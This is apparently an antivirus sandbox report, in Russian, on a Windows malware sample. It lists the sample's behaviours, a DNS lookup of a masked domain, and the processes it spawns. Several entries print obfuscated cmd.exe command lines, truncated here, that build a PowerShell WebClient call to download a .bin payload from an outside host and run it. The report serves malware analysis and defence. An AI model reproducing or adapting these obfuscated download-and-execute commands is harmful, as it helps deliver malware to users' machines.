Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c %PRogrAmDaTa:~0,1%%ProgRAmData:~9,2% /v: /c "set CBku=5pr+Ls;t7Gui\ng,fz2S=@C.PdWbe:RcEw0)/B$1TUx l(NMyvFmj8Z3AI6~a{hoD9-}'4%kO& FOR %z In ( 1 63 33 70 24 41 37 4 57 2...
Сетевая активность
UDP
- DNS ASK fr##.#iegoalex.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c %PRogrAmDaTa:~0,1%%ProgRAmData:~9,2% /v: /c "set CBku=5pr+Ls;t7Gui\ng,fz2S=@C.PdWbe:RcEw0)/B$1TUx l(NMyvFmj8Z3AI6~a{hoD9-}'4%kO& FOR %z In ( 1 63 33 70 24 41 37 4 57 2...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /v: /c "set CBku=5pr+Ls;t7Gui\ng,fz2S=@C.PdWbe:RcEw0)/B$1TUx l(NMyvFmj8Z3AI6~a{hoD9-}'4%kO& FOR %z In ( 1 63 33 70 24 41 37 4 57 22 29 59 0 15 39 70 2 70 19 ...
- '<SYSTEM32>\cmd.exe' /S /D /c" ecHo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $z227='n144';$h406=new-object Net.WebClient;$r280='http://fr##.#iegoalex.com/3289fkjsdfyu3.bin'.Split('@');$j289='i449';$L742 ...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "delims=TFSH tokens=1" %J IN ('ftype^|findstr mdFi') DO %J "
- '<SYSTEM32>\cmd.exe' /c ftype|findstr mdFi
- '<SYSTEM32>\cmd.exe' /S /D /c" ftype"
- '<SYSTEM32>\findstr.exe' mdFi
- '<SYSTEM32>\cmd.exe'
